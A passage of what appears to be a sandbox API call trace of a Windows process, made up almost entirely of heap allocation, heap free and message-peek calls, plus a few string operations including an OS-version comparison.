(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0252.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0252.931] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0252.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0252.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0252.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0252.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0252.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0252.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0252.931] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0252.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0252.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0252.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0252.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0252.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0252.932] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0252.932] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0252.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0252.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0252.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0252.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0252.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0252.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0252.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.932] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0252.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0252.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0252.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0252.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0252.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0252.933] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0252.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0252.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0252.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0252.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0252.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0252.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0252.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0252.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0252.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0252.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0252.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0252.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0252.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0252.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0252.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0252.934] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0252.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0252.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0252.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0252.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0252.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0252.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0252.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0252.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0252.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0252.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0252.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0252.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0252.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0252.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0252.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0252.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0252.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.935] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0252.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0252.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0252.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0252.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0252.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0252.935] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0252.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0252.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0252.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9d0 [0252.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0252.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0252.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa568 [0252.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0252.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0252.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0252.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0252.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0252.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0252.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0252.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0252.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0252.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0252.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0252.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0252.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0252.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0252.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0252.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0252.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.937] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0252.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0252.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0252.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0252.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0252.937] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0252.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4c0 [0252.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0252.938] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0252.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0252.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0252.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0252.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0252.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0252.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0252.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0252.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0252.938] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0252.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0252.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0252.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0252.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0252.939] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0252.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0252.939] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0252.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0252.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0252.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0252.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0252.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0252.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0252.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0252.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0252.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0252.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0252.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0252.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0252.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0252.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0252.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0252.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0252.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0252.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0252.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0252.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0252.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0252.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0252.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0252.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0252.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0252.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0252.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.942] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0252.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0252.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0252.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0252.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0252.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0252.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0252.943] HeapFree (in: hHeap=0x25c0000, 